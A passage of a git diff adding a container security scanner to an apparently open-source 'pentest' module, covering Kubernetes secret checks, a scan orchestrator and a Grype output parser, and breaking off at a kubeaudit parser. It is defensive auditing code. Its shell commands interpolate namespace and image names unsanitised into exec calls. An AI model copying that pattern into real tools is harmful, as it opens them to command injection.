+        `Secret ${secret.name} is a default service account token. Consider using dedicated service accounts.`,
+        "Create and use dedicated service accounts"
+      ))
+    }
+
+    // Check for basic auth secrets
+    if (secret.type === "kubernetes.io/basic-auth") {
+      findings.push(createFinding(
+        secret.name,
+        secret.namespace,
+        "medium",
+        "Basic Auth Secret",
+        `Secret ${secret.name} contains basic authentication credentials. Ensure these are properly protected.`,
+        "Consider using more secure authentication methods"
+      ))
+    }
+
+    // Check for TLS secrets without proper rotation
+    if (secret.type === "kubernetes.io/tls") {
+      const createdAt = secret.createdAt
+      if (createdAt) {
+        const age = Date.now() - new Date(createdAt).getTime()
+        const ninetyDays = 90 * 24 * 60 * 60 * 1000
+        if (age > ninetyDays) {
+          findings.push(createFinding(
+            secret.name,
+            secret.namespace,
+            "medium",
+            "Old TLS Certificate",
+            `TLS secret ${secret.name} was created over 90 days ago. Consider rotating the certificate.`,
+            "Implement automatic certificate rotation"
+          ))
+        }
+      }
+    }
+
+    // Check for secrets with sensitive key names
+    const sensitiveKeyPatterns = ["password", "secret", "key", "token", "credential", "api_key"]
+    for (const key of secret.keys) {
+      const keyLower = key.toLowerCase()
+      if (sensitiveKeyPatterns.some((p) => keyLower.includes(p))) {
+        // This is informational - just noting that sensitive data is stored
+        log.debug("Sensitive key found in secret", { secret: secret.name, key })
+      }
+    }
+
+    // Check for secrets without annotations (might not have proper metadata)
+    if (!secret.annotations || Object.keys(secret.annotations).length === 0) {
+      findings.push(createFinding(
+        secret.name,
+        secret.namespace,
+        "low",
+        "Secret Without Annotations",
+        `Secret ${secret.name} has no annotations. Consider adding metadata for tracking.`,
+        "Add annotations for ownership, purpose, and rotation schedule"
+      ))
+    }
+
+    return findings
+  }
+
+  /**
+   * Find secrets not used by any pod
+   */
+  async function findUnusedSecrets(namespace?: string): Promise<{ name: string; namespace: string }[]> {
+    const unused: { name: string; namespace: string }[] = []
+
+    try {
+      // Get all secrets
+      const secrets = await list(namespace)
+
+      // Get all pods
+      const podCmd = namespace
+        ? `kubectl get pods -n ${namespace} -o json`
+        : "kubectl get pods --all-namespaces -o json"
+
+      const { stdout: podOut } = await execAsync(podCmd)
+      const podData = JSON.parse(podOut)
+
+      // Extract secret references from pods
+      const usedSecrets = new Set<string>()
+      for (const pod of podData.items || []) {
+        const ns = pod.metadata?.namespace || "default"
+
+        // Check volume mounts
+        for (const volume of pod.spec?.volumes || []) {
+          if (volume.secret?.secretName) {
+            usedSecrets.add(`${ns}/${volume.secret.secretName}`)
+          }
+        }
+
+        // Check env vars
+        for (const container of pod.spec?.containers || []) {
+          for (const env of container.env || []) {
+            if (env.valueFrom?.secretKeyRef?.name) {
+              usedSecrets.add(`${ns}/${env.valueFrom.secretKeyRef.name}`)
+            }
+          }
+          for (const envFrom of container.envFrom || []) {
+            if (envFrom.secretRef?.name) {
+              usedSecrets.add(`${ns}/${envFrom.secretRef.name}`)
+            }
+          }
+        }
+
+        // Check image pull secrets
+        for (const ips of pod.spec?.imagePullSecrets || []) {
+          if (ips.name) {
+            usedSecrets.add(`${ns}/${ips.name}`)
+          }
+        }
+      }
+
+      // Find unused secrets
+      for (const secret of secrets) {
+        const key = `${secret.namespace}/${secret.name}`
+        // Skip service account tokens
+        if (secret.type === "kubernetes.io/service-account-token") continue
+        if (!usedSecrets.has(key)) {
+          unused.push({ name: secret.name, namespace: secret.namespace })
+        }
+      }
+
+      return unused
+    } catch (error) {
+      log.error("Failed to find unused secrets", { error })
+      return []
+    }
+  }
+
+  /**
+   * Check encryption at rest configuration
+   */
+  export async function checkEncryptionAtRest(): Promise<{ enabled: boolean; provider?: string; error?: string }> {
+    try {
+      // This check requires access to API server configuration
+      // We can only infer from cluster behavior
+      const { stdout } = await execAsync(
+        "kubectl get apiserver -o jsonpath='{.items[0].spec.encryption}' 2>/dev/null || echo ''"
+      )
+
+      if (stdout && stdout !== "''") {
+        return { enabled: true, provider: "configured" }
+      }
+
+      return {
+        enabled: false,
+        error: "Unable to verify encryption at rest configuration. Check API server settings.",
+      }
+    } catch {
+      return {
+        enabled: false,
+        error: "Unable to access API server configuration",
+      }
+    }
+  }
+
+  /**
+   * Parse secret from kubectl JSON
+   */
+  function parseSecret(item: Record<string, unknown>): ContainerScanTypes.K8sSecret {
+    const metadata = item.metadata as Record<string, unknown>
+    const data = item.data as Record<string, string> | undefined
+
+    return {
+      name: metadata.name as string,
+      namespace: metadata.namespace as string,
+      type: item.type as string,
+      keys: data ? Object.keys(data) : [],
+      createdAt: metadata.creationTimestamp as string,
+      annotations: metadata.annotations as Record<string, string>,
+    }
+  }
+
+  /**
+   * Create a finding
+   */
+  function createFinding(
+    secretName: string,
+    namespace: string,
+    severity: ContainerScanTypes.Severity,
+    title: string,
+    description: string,
+    remediation: string
+  ): ContainerScanTypes.ContainerFinding {
+    return {
+      id: `k8s-secret-${secretName}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+      category: "secret",
+      severity,
+      title,
+      description,
+      resource: {
+        type: "cluster",
+        name: secretName,
+        namespace,
+      },
+      remediation,
+      compliance: [
+        { framework: "cis-kubernetes", control: "Secrets Management" },
+      ],
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/orchestrator.ts b/packages/opencode/src/pentest/containerscan/orchestrator.ts
new file mode 100644
index 00000000000..f3bf32c502f
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/orchestrator.ts
@@ -0,0 +1,606 @@
+/**
+ * @fileoverview Container Security Scanner Orchestrator
+ *
+ * Coordinates container security scanning operations.
+ *
+ * @module pentest/containerscan/orchestrator
+ */
+
+import { Log } from "../../util/log"
+import { Bus } from "../../bus"
+import { ContainerScanTypes } from "./types"
+import { ContainerScanEvents } from "./events"
+import { ContainerScanProfiles } from "./profiles"
+import { ContainerScanStorage } from "./storage"
+import type { StorageConfig } from "./storage"
+import { DockerImages, DockerContainers, DockerConfig, DockerSecrets } from "./docker"
+import {
+  KubernetesCluster,
+  KubernetesPods,
+  KubernetesRBAC,
+  KubernetesNetwork,
+  KubernetesSecrets,
+  KubernetesAdmission,
+} from "./kubernetes"
+import { RegistryScanner } from "./registry"
+
+const log = Log.create({ service: "pentest.containerscan.orchestrator" })
+
+/**
+ * Orchestrator options
+ */
+export interface OrchestratorOptions {
+  profile?: ContainerScanTypes.ProfileId
+  customProfile?: Partial<ContainerScanTypes.ScanProfile>
+  storageConfig?: StorageConfig
+  timeout?: number
+}
+
+/**
+ * Container Scanner Orchestrator namespace
+ */
+export namespace ContainerScanOrchestrator {
+  /**
+   * Run a full container security scan
+   */
+  export async function scan(
+    targets: string[],
+    options: OrchestratorOptions = {}
+  ): Promise<ContainerScanTypes.ContainerScanResult> {
+    const startTime = Date.now()
+    const scanId = ContainerScanTypes.generateScanId()
+    const profile = options.customProfile
+      ? ContainerScanProfiles.createCustom(options.profile || "standard", options.customProfile)
+      : ContainerScanProfiles.get(options.profile || "standard")
+
+    log.info("Starting container scan", { scanId, profile: profile.id, targets })
+
+    // Initialize result
+    const result: ContainerScanTypes.ContainerScanResult = {
+      id: scanId,
+      profile: profile.id,
+      status: "running",
+      startedAt: startTime,
+      images: [],
+      findings: [],
+      sboms: [],
+      stats: {
+        imagesScanned: 0,
+        containersScanned: 0,
+        totalVulnerabilities: 0,
+        criticalVulnerabilities: 0,
+        highVulnerabilities: 0,
+        findingsCount: 0,
+        duration: 0,
+      },
+    }
+
+    // Emit scan started event
+    Bus.publish(ContainerScanEvents.ScanStarted, {
+      scanId,
+      profile: profile.id,
+      targets,
+    })
+
+    try {
+      // Save initial state
+      await ContainerScanStorage.saveScan(result, options.storageConfig)
+
+      // Run image scanning if enabled
+      if (profile.image.enabled) {
+        await runImageScanning(scanId, targets, profile, result, options)
+      }
+
+      // Run runtime analysis if enabled
+      if (profile.runtime.enabled) {
+        await runRuntimeAnalysis(scanId, profile, result, options)
+      }
+
+      // Run Kubernetes analysis if enabled
+      if (profile.kubernetes.enabled) {
+        await runKubernetesAnalysis(scanId, profile, result, options)
+      }
+
+      // Run compliance checks if enabled
+      if (profile.compliance.enabled && profile.compliance.frameworks.length > 0) {
+        await runComplianceChecks(scanId, profile, result, options)
+      }
+
+      // Update final stats
+      result.status = "completed"
+      result.completedAt = Date.now()
+      result.stats.duration = result.completedAt - startTime
+      result.stats.findingsCount = result.findings.length
+
+      // Save final result
+      await ContainerScanStorage.saveScan(result, options.storageConfig)
+
+      // Emit scan completed event
+      Bus.publish(ContainerScanEvents.ScanCompleted, {
+        scanId,
+        profile: profile.id,
+        duration: result.stats.duration,
+        imagesScanned: result.stats.imagesScanned,
+        containersScanned: result.stats.containersScanned,
+        totalVulnerabilities: result.stats.totalVulnerabilities,
+        findingsCount: result.stats.findingsCount,
+      })
+
+      log.info("Container scan complete", {
+        scanId,
+        duration: result.stats.duration,
+        imagesScanned: result.stats.imagesScanned,
+        totalVulnerabilities: result.stats.totalVulnerabilities,
+        findings: result.stats.findingsCount,
+      })
+
+      return result
+    } catch (error) {
+      result.status = "failed"
+      result.completedAt = Date.now()
+      result.error = error instanceof Error ? error.message : String(error)
+
+      await ContainerScanStorage.saveScan(result, options.storageConfig)
+
+      Bus.publish(ContainerScanEvents.ScanFailed, {
+        scanId,
+        error: result.error,
+      })
+
+      log.error("Container scan failed", { scanId, error: result.error })
+      throw error
+    }
+  }
+
+  /**
+   * Scan a single image
+   */
+  export async function scanImage(
+    image: string,
+    options: OrchestratorOptions & { generateSBOM?: boolean } = {}
+  ): Promise<ContainerScanTypes.ImageScanResult> {
+    const scanId = ContainerScanTypes.generateScanId()
+    const profile = ContainerScanProfiles.get(options.profile || "quick")
+
+    log.info("Scanning image", { scanId, image })
+
+    try {
+      const { result, sbom } = await DockerImages.scanComprehensive(image, scanId, {
+        severities: getSeverityThreshold(profile.image.severityThreshold),
+        ignoreUnfixed: profile.image.ignoreUnfixed,
+        generateSBOM: options.generateSBOM || profile.image.generateSBOM,
+        timeout: options.timeout || profile.timeout,
+      })
+
+      // Save result
+      await ContainerScanStorage.saveImageResult(result, options.storageConfig)
+      if (sbom) {
+        await ContainerScanStorage.saveSBOM(sbom, options.storageConfig)
+      }
+
+      return result
+    } catch (error) {
+      log.error("Image scan failed", { image, error })
+      throw error
+    }
+  }
+
+  /**
+   * Scan running containers
+   */
+  export async function scanRuntime(
+    options: OrchestratorOptions = {}
+  ): Promise<ContainerScanTypes.RuntimeScanResult> {
+    const scanId = ContainerScanTypes.generateScanId()
+    const profile = ContainerScanProfiles.get(options.profile || "standard")
+
+    log.info("Scanning runtime", { scanId })
+
+    const result = await DockerContainers.analyzeAll(scanId, {
+      checkPrivileged: profile.runtime.checkPrivileged,
+      checkRootUser: profile.runtime.checkRootUser,
+      checkCapabilities: profile.runtime.checkCapabilities,
+      checkMounts: profile.runtime.checkMounts,
+      checkNetworking: profile.runtime.checkNetworking,
+    })
+
+    // Check daemon config if enabled
+    if (profile.runtime.checkDaemon) {
+      const daemonConfig = await DockerConfig.getConfig()
+      const daemonFindings = await DockerConfig.audit()
+      result.daemonConfig = daemonConfig
+      result.findings.push(...daemonFindings)
+    }
+
+    return result
+  }
+
+  /**
+   * Scan Kubernetes cluster
+   */
+  export async function scanCluster(
+    options: OrchestratorOptions & { namespace?: string } = {}
+  ): Promise<ContainerScanTypes.KubernetesScanResult> {
+    const scanId = ContainerScanTypes.generateScanId()
+    const profile = ContainerScanProfiles.get(options.profile || "standard")
+
+    log.info("Scanning Kubernetes cluster", { scanId, namespace: options.namespace })
+
+    const result: ContainerScanTypes.KubernetesScanResult = {
+      pods: [],
+      rbacBindings: [],
+      networkPolicies: [],
+      secrets: [],
+      findings: [],
+      scannedAt: Date.now(),
+      stats: {
+        totalPods: 0,
+        privilegedPods: 0,
+        hostNetworkPods: 0,
+        clusterAdminBindings: 0,
+        findingsCount: 0,
+      },
+    }
+
+    try {
+      // Get cluster info
+      result.cluster = await KubernetesCluster.getClusterInfo()
+      const clusterFindings = await KubernetesCluster.analyzeCluster(scanId)
+      result.findings.push(...clusterFindings)
+    } catch (error) {
+      log.warn("Could not get cluster info", { error })
+    }
+
+    // Scan pods if enabled
+    if (profile.kubernetes.scanPods) {
+      const podResult = await KubernetesPods.analyzeAll(scanId, options.namespace)
+      result.pods = podResult.pods
+      result.findings.push(...podResult.findings)
+      result.stats.totalPods = podResult.stats.totalPods
+      result.stats.privilegedPods = podResult.stats.privilegedPods
+      result.stats.hostNetworkPods = podResult.stats.hostNetworkPods
+    }
+
+    // Scan RBAC if enabled
+    if (profile.kubernetes.scanRBAC) {
+      const rbacFindings = await KubernetesRBAC.analyze(scanId)
+      result.findings.push(...rbacFindings)
+
+      const bindings = await KubernetesRBAC.listClusterRoleBindings()
+      result.rbacBindings = bindings
+      result.stats.clusterAdminBindings = bindings.filter(
+        (b) => b.roleRef.name === "cluster-admin"
+      ).length
+    }
+
+    // Scan network policies if enabled
+    if (profile.kubernetes.scanNetworkPolicies) {
+      const networkPolicies = await KubernetesNetwork.listNetworkPolicies(options.namespace)
+      const networkFindings = await KubernetesNetwork.analyze(options.namespace)
+      result.networkPolicies = networkPolicies
+      result.findings.push(...networkFindings)
+    }
+
+    // Scan secrets if enabled
+    if (profile.kubernetes.scanSecrets) {
+      const secrets = await KubernetesSecrets.list(options.namespace)
+      const secretFindings = await KubernetesSecrets.analyze(options.namespace)
+      result.secrets = secrets
+      result.findings.push(...secretFindings)
+    }
+
+    // Scan admission controllers if enabled
+    if (profile.kubernetes.scanAdmission) {
+      const admissionFindings = await KubernetesAdmission.analyze()
+      result.findings.push(...admissionFindings)
+    }
+
+    result.stats.findingsCount = result.findings.length
+
+    return result
+  }
+
+  /**
+   * Generate SBOM for an image
+   */
+  export async function generateSBOM(
+    image: string,
+    options: OrchestratorOptions & { format?: "json" | "cyclonedx-json" | "spdx-json" } = {}
+  ): Promise<ContainerScanTypes.SBOM> {
+    const scanId = ContainerScanTypes.generateScanId()
+
+    log.info("Generating SBOM", { scanId, image })
+
+    const sbom = await DockerImages.generateSBOM(image, scanId, {
+      format: options.format || "json",
+      timeout: options.timeout,
+    })
+
+    await ContainerScanStorage.saveSBOM(sbom, options.storageConfig)
+
+    return sbom
+  }
+
+  /**
+   * Discover container assets
+   */
+  export async function discover(): Promise<{
+    images: ContainerScanTypes.DockerImage[]
+    containers: ContainerScanTypes.RunningContainer[]
+    cluster?: ContainerScanTypes.KubernetesCluster
+  }> {
+    const result: {
+      images: ContainerScanTypes.DockerImage[]
+      containers: ContainerScanTypes.RunningContainer[]
+      cluster?: ContainerScanTypes.KubernetesCluster
+    } = {
+      images: [],
+      containers: [],
+    }
+
+    // List Docker images
+    try {
+      result.images = await DockerImages.list()
+    } catch (error) {
+      log.warn("Could not list Docker images", { error })
+    }
+
+    // List running containers
+    try {
+      result.containers = await DockerContainers.list()
+    } catch (error) {
+      log.warn("Could not list containers", { error })
+    }
+
+    // Get Kubernetes cluster info
+    try {
+      result.cluster = await KubernetesCluster.getClusterInfo()
+    } catch (error) {
+      log.debug("Could not get Kubernetes cluster info", { error })
+    }
+
+    return result
+  }
+
+  /**
+   * Check available tools
+   */
+  export async function checkTools(): Promise<{
+    docker: boolean
+    kubectl: boolean
+    trivy: boolean
+    grype: boolean
+    syft: boolean
+    kubeaudit: boolean
+  }> {
+    const dockerTools = await DockerImages.checkTools()
+    const kubectl = await KubernetesCluster.isKubectlAvailable()
+
+    let kubeaudit = false
+    try {
+      const { exec } = await import("child_process")
+      const { promisify } = await import("util")
+      const execAsync = promisify(exec)
+      await execAsync("kubeaudit version")
+      kubeaudit = true
+    } catch {
+      kubeaudit = false
+    }
+
+    return {
+      ...dockerTools,
+      kubectl,
+      kubeaudit,
+    }
+  }
+
+  // =====================
+  // Private Functions
+  // =====================
+
+  /**
+   * Run image scanning phase
+   */
+  async function runImageScanning(
+    scanId: string,
+    targets: string[],
+    profile: ContainerScanTypes.ScanProfile,
+    result: ContainerScanTypes.ContainerScanResult,
+    options: OrchestratorOptions
+  ): Promise<void> {
+    Bus.publish(ContainerScanEvents.ScanProgress, {
+      scanId,
+      phase: "images",
+      progress: 0,
+      message: "Scanning images",
+    })
+
+    for (let i = 0; i < targets.length; i++) {
+      const target = targets[i]
+
+      try {
+        // Check if target is an image or needs discovery
+        if (target === "*" || target === "all") {
+          // Scan all local images
+          const images = await DockerImages.list()
+          for (const image of images.slice(0, 10)) {
+            // Limit to 10 images
+            const imageRef = image.repoTags[0] || image.id
+            const { result: imageResult, sbom } = await DockerImages.scanComprehensive(imageRef, scanId, {
+              severities: getSeverityThreshold(profile.image.severityThreshold),
+              ignoreUnfixed: profile.image.ignoreUnfixed,
+              generateSBOM: profile.image.generateSBOM,
+              timeout: options.timeout || profile.timeout,
+            })
+            result.images.push(imageResult)
+            if (sbom) result.sboms.push(sbom)
+          }
+        } else {
+          // Scan specific image
+          const { result: imageResult, sbom } = await DockerImages.scanComprehensive(target, scanId, {
+            severities: getSeverityThreshold(profile.image.severityThreshold),
+            ignoreUnfixed: profile.image.ignoreUnfixed,
+            generateSBOM: profile.image.generateSBOM,
+            timeout: options.timeout || profile.timeout,
+          })
+          result.images.push(imageResult)
+          if (sbom) result.sboms.push(sbom)
+        }
+      } catch (error) {
+        log.warn("Failed to scan image", { target, error })
+      }
+
+      // Update progress
+      Bus.publish(ContainerScanEvents.ScanProgress, {
+        scanId,
+        phase: "images",
+        progress: Math.round(((i + 1) / targets.length) * 100),
+        message: `Scanned ${i + 1}/${targets.length} targets`,
+      })
+    }
+
+    // Secret scanning on images if enabled
+    if (profile.image.scanSecrets) {
+      for (const image of result.images) {
+        try {
+          const secretFindings = await DockerSecrets.scanImageWithTrivy(image.image, scanId)
+          result.findings.push(...secretFindings)
+        } catch {
+          // Ignore secret scan failures
+        }
+      }
+    }
+
+    // Update stats
+    result.stats.imagesScanned = result.images.length
+    result.stats.totalVulnerabilities = result.images.reduce((acc, img) => acc + img.stats.total, 0)
+    result.stats.criticalVulnerabilities = result.images.reduce((acc, img) => acc + img.stats.critical, 0)
+    result.stats.highVulnerabilities = result.images.reduce((acc, img) => acc + img.stats.high, 0)
+  }
+
+  /**
+   * Run runtime analysis phase
+   */
+  async function runRuntimeAnalysis(
+    scanId: string,
+    profile: ContainerScanTypes.ScanProfile,
+    result: ContainerScanTypes.ContainerScanResult,
+    options: OrchestratorOptions
+  ): Promise<void> {
+    Bus.publish(ContainerScanEvents.ScanProgress, {
+      scanId,
+      phase: "runtime",
+      progress: 0,
+      message: "Analyzing running containers",
+    })
+
+    const runtimeResult = await DockerContainers.analyzeAll(scanId, {
+      checkPrivileged: profile.runtime.checkPrivileged,
+      checkRootUser: profile.runtime.checkRootUser,
+      checkCapabilities: profile.runtime.checkCapabilities,
+      checkMounts: profile.runtime.checkMounts,
+      checkNetworking: profile.runtime.checkNetworking,
+    })
+
+    result.runtime = runtimeResult
+    result.findings.push(...runtimeResult.findings)
+    result.stats.containersScanned = runtimeResult.stats.totalContainers
+
+    // Daemon configuration if enabled
+    if (profile.runtime.checkDaemon) {
+      try {
+        const daemonFindings = await DockerConfig.audit()
+        result.findings.push(...daemonFindings)
+        result.runtime.daemonConfig = await DockerConfig.getConfig()
+      } catch {
+        // Ignore daemon check failures
+      }
+    }
+  }
+
+  /**
+   * Run Kubernetes analysis phase
+   */
+  async function runKubernetesAnalysis(
+    scanId: string,
+    profile: ContainerScanTypes.ScanProfile,
+    result: ContainerScanTypes.ContainerScanResult,
+    options: OrchestratorOptions
+  ): Promise<void> {
+    Bus.publish(ContainerScanEvents.ScanProgress, {
+      scanId,
+      phase: "kubernetes",
+      progress: 0,
+      message: "Analyzing Kubernetes cluster",
+    })
+
+    try {
+      const k8sResult = await scanCluster({
+        ...options,
+        namespace: profile.kubernetes.namespace,
+      })
+      result.kubernetes = k8sResult
+      result.findings.push(...k8sResult.findings)
+    } catch (error) {
+      log.warn("Kubernetes analysis failed", { error })
+    }
+  }
+
+  /**
+   * Run compliance checks phase
+   */
+  async function runComplianceChecks(
+    scanId: string,
+    profile: ContainerScanTypes.ScanProfile,
+    result: ContainerScanTypes.ContainerScanResult,
+    options: OrchestratorOptions
+  ): Promise<void> {
+    Bus.publish(ContainerScanEvents.ScanProgress, {
+      scanId,
+      phase: "compliance",
+      progress: 0,
+      message: "Running compliance checks",
+    })
+
+    result.compliance = []
+
+    // Note: Full compliance checking would require more extensive implementation
+    // This is a placeholder for framework-specific checks
+
+    for (const framework of profile.compliance.frameworks) {
+      const complianceResult: ContainerScanTypes.ComplianceResult = {
+        framework,
+        passed: 0,
+        failed: 0,
+        skipped: 0,
+        checks: [],
+        scannedAt: Date.now(),
+      }
+
+      // Count findings by framework
+      const frameworkFindings = result.findings.filter(
+        (f) => f.compliance?.some((c) => c.framework === framework)
+      )
+
+      complianceResult.failed = frameworkFindings.length
+      result.compliance.push(complianceResult)
+
+      Bus.publish(ContainerScanEvents.ComplianceChecked, {
+        scanId,
+        framework,
+        passed: complianceResult.passed,
+        failed: complianceResult.failed,
+        skipped: complianceResult.skipped,
+      })
+    }
+  }
+
+  /**
+   * Get severity threshold array
+   */
+  function getSeverityThreshold(threshold: ContainerScanTypes.Severity): ContainerScanTypes.Severity[] {
+    const order: ContainerScanTypes.Severity[] = ["critical", "high", "medium", "low", "negligible"]
+    const idx = order.indexOf(threshold)
+    return order.slice(0, idx + 1)
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/parsers/grype.ts b/packages/opencode/src/pentest/containerscan/parsers/grype.ts
new file mode 100644
index 00000000000..6b9e77f972d
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/parsers/grype.ts
@@ -0,0 +1,335 @@
+/**
+ * @fileoverview Grype JSON Output Parser
+ *
+ * Parses Grype vulnerability scanner JSON output.
+ *
+ * @module pentest/containerscan/parsers/grype
+ */
+
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const log = Log.create({ service: "pentest.containerscan.parsers.grype" })
+
+/**
+ * Grype JSON output structure
+ */
+interface GrypeOutput {
+  matches: GrypeMatch[]
+  source: {
+    type: string
+    target: {
+      userInput: string
+      imageID?: string
+      manifestDigest?: string
+      mediaType?: string
+      tags?: string[]
+      layers?: { mediaType: string; digest: string; size: number }[]
+    }
+  }
+  distro?: {
+    name: string
+    version: string
+    idLike?: string[]
+  }
+  descriptor?: {
+    name: string
+    version: string
+    configuration?: Record<string, unknown>
+  }
+}
+
+interface GrypeMatch {
+  vulnerability: GrypeVulnerability
+  relatedVulnerabilities?: GrypeRelatedVulnerability[]
+  matchDetails: GrypeMatchDetail[]
+  artifact: GrypeArtifact
+}
+
+interface GrypeVulnerability {
+  id: string
+  dataSource: string
+  namespace?: string
+  severity: string
+  urls?: string[]
+  description?: string
+  cvss?: GrypeCVSS[]
+  fix?: {
+    versions: string[]
+    state: string
+  }
+  advisories?: { id: string; link: string }[]
+}
+
+interface GrypeRelatedVulnerability {
+  id: string
+  dataSource: string
+  namespace?: string
+  severity: string
+  urls?: string[]
+  description?: string
+  cvss?: GrypeCVSS[]
+}
+
+interface GrypeCVSS {
+  version: string
+  vector: string
+  metrics: {
+    baseScore: number
+    exploitabilityScore?: number
+    impactScore?: number
+  }
+  vendorMetadata?: Record<string, unknown>
+}
+
+interface GrypeMatchDetail {
+  type: string
+  matcher: string
+  searchedBy: Record<string, unknown>
+  found: Record<string, unknown>
+}
+
+interface GrypeArtifact {
+  id: string
+  name: string
+  version: string
+  type: string
+  foundBy: string
+  locations: { path: string; layerID?: string }[]
+  language?: string
+  licenses?: string[]
+  cpes?: string[]
+  purl?: string
+  upstreams?: { name: string; version?: string }[]
+  metadataType?: string
+  metadata?: Record<string, unknown>
+}
+
+/**
+ * Grype parser namespace
+ */
+export namespace GrypeParser {
+  /**
+   * Parse Grype JSON output into ImageScanResult
+   */
+  export function parse(output: string, image: string): ContainerScanTypes.ImageScanResult {
+    try {
+      const data = JSON.parse(output) as GrypeOutput
+
+      const vulnerabilities: ContainerScanTypes.ImageVulnerability[] = []
+      const stats = {
+        critical: 0,
+        high: 0,
+        medium: 0,
+        low: 0,
+        negligible: 0,
+        unknown: 0,
+        total: 0,
+        fixable: 0,
+      }
+
+      // Process each match
+      for (const match of data.matches || []) {
+        const vuln = match.vulnerability
+        const severity = mapSeverity(vuln.severity)
+
+        // Get best CVSS score
+        let cvssScore: number | undefined
+        let cvssVector: string | undefined
+        if (vuln.cvss && vuln.cvss.length > 0) {
+          // Prefer v3 over v2
+          const v3 = vuln.cvss.find((c) => c.version.startsWith("3"))
+          const best = v3 || vuln.cvss[0]
+          cvssScore = best.metrics.baseScore
+          cvssVector = best.vector
+        }
+
+        // Get fixed version
+        let fixedVersion: string | undefined
+        if (vuln.fix && vuln.fix.state === "fixed" && vuln.fix.versions.length > 0) {
+          fixedVersion = vuln.fix.versions[0]
+        }
+
+        // Get layer info
+        const layer = match.artifact.locations?.[0]?.layerID
+
+        vulnerabilities.push({
+          id: vuln.id,
+          cveId: vuln.id.startsWith("CVE-") ? vuln.id : undefined,
+          severity,
+          title: vuln.id,
+          description: vuln.description,
+          packageName: match.artifact.name,
+          installedVersion: match.artifact.version,
+          fixedVersion,
+          layer,
+          cvss: cvssScore ? { score: cvssScore, vector: cvssVector } : undefined,
+          references: vuln.urls,
+        })
+
+        // Update stats
+        stats[severity]++
+        stats.total++
+        if (fixedVersion) {
+          stats.fixable++
+        }
+      }
+
+      log.info("Grype output parsed", {
+        image,
+        vulnerabilities: stats.total,
+        critical: stats.critical,
+        high: stats.high,
+      })
+
+      return {
+        image,
+        imageId: data.source.target.imageID,
+        digest: data.source.target.manifestDigest,
+        vulnerabilities,
+        scanTool: "grype",
+        scannedAt: Date.now(),
+        stats,
+      }
+    } catch (error) {
+      log.error("Failed to parse Grype output", { error, image })
+      throw new Error(`Failed to parse Grype output: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Extract packages from Grype output for SBOM comparison
+   */
+  export function extractPackages(output: string): { name: string; version: string; type: string; purl?: string }[] {
+    try {
+      const data = JSON.parse(output) as GrypeOutput
+      const seen = new Set<string>()
+      const packages: { name: string; version: string; type: string; purl?: string }[] = []
+
+      for (const match of data.matches || []) {
+        const key = `${match.artifact.name}@${match.artifact.version}`
+        if (!seen.has(key)) {
+          seen.add(key)
+          packages.push({
+            name: match.artifact.name,
+            version: match.artifact.version,
+            type: match.artifact.type,
+            purl: match.artifact.purl,
+          })
+        }
+      }
+
+      return packages
+    } catch (error) {
+      log.error("Failed to extract packages from Grype output", { error })
+      return []
+    }
+  }
+
+  /**
+   * Build Grype command for image scanning
+   */
+  export function buildCommand(
+    image: string,
+    options: {
+      failOnSeverity?: ContainerScanTypes.Severity
+      onlyFixed?: boolean
+      scope?: "squashed" | "all-layers"
+    } = {}
+  ): string {
+    const args = ["grype", image, "-o", "json"]
+
+    // Fail on severity
+    if (options.failOnSeverity) {
+      args.push("--fail-on", options.failOnSeverity)
+    }
+
+    // Only show fixed vulnerabilities
+    if (options.onlyFixed) {
+      args.push("--only-fixed")
+    }
+
+    // Scope
+    if (options.scope) {
+      args.push("--scope", options.scope)
+    }
+
+    return args.join(" ")
+  }
+
+  /**
+   * Merge Grype results with Trivy results
+   */
+  export function mergeWithTrivy(
+    grypeResult: ContainerScanTypes.ImageScanResult,
+    trivyResult: ContainerScanTypes.ImageScanResult
+  ): ContainerScanTypes.ImageScanResult {
+    // Create a map of existing vulnerabilities
+    const vulnMap = new Map<string, ContainerScanTypes.ImageVulnerability>()
+
+    // Add Trivy vulnerabilities first (higher priority)
+    for (const vuln of trivyResult.vulnerabilities) {
+      vulnMap.set(vuln.id, vuln)
+    }
+
+    // Add Grype vulnerabilities (only if not already present)
+    for (const vuln of grypeResult.vulnerabilities) {
+      if (!vulnMap.has(vuln.id)) {
+        vulnMap.set(vuln.id, vuln)
+      }
+    }
+
+    const mergedVulns = Array.from(vulnMap.values())
+
+    // Recalculate stats
+    const stats = {
+      critical: 0,
+      high: 0,
+      medium: 0,
+      low: 0,
+      negligible: 0,
+      unknown: 0,
+      total: 0,
+      fixable: 0,
+    }
+
+    for (const vuln of mergedVulns) {
+      stats[vuln.severity]++
+      stats.total++
+      if (vuln.fixedVersion) {
+        stats.fixable++
+      }
+    }
+
+    return {
+      image: trivyResult.image,
+      imageId: trivyResult.imageId || grypeResult.imageId,
+      digest: trivyResult.digest || grypeResult.digest,
+      vulnerabilities: mergedVulns,
+      sbom: trivyResult.sbom,
+      scanTool: "trivy+grype",
+      scannedAt: Date.now(),
+      stats,
+    }
+  }
+
+  /**
+   * Map Grype severity to standard severity
+   */
+  function mapSeverity(severity: string): ContainerScanTypes.Severity {
+    switch (severity.toLowerCase()) {
+      case "critical":
+        return "critical"
+      case "high":
+        return "high"
+      case "medium":
+        return "medium"
+      case "low":
+        return "low"
+      case "negligible":
+        return "negligible"
+      default:
+        return "unknown"
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/parsers/index.ts b/packages/opencode/src/pentest/containerscan/parsers/index.ts
new file mode 100644
index 00000000000..5c933227327
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/parsers/index.ts
@@ -0,0 +1,12 @@
+/**
+ * @fileoverview Container Scanner Parsers
+ *
+ * Exports for external tool output parsers.
+ *
+ * @module pentest/containerscan/parsers
+ */
+
+export { TrivyParser } from "./trivy"
+export { GrypeParser } from "./grype"
+export { SyftParser } from "./syft"
+export { KubeauditParser } from "./kubeaudit"
diff --git a/packages/opencode/src/pentest/containerscan/parsers/kubeaudit.ts b/packages/opencode/src/pentest/containerscan/parsers/kubeaudit.ts
new file mode 100644
index 00000000000..12c39bd3add
--- /dev/null
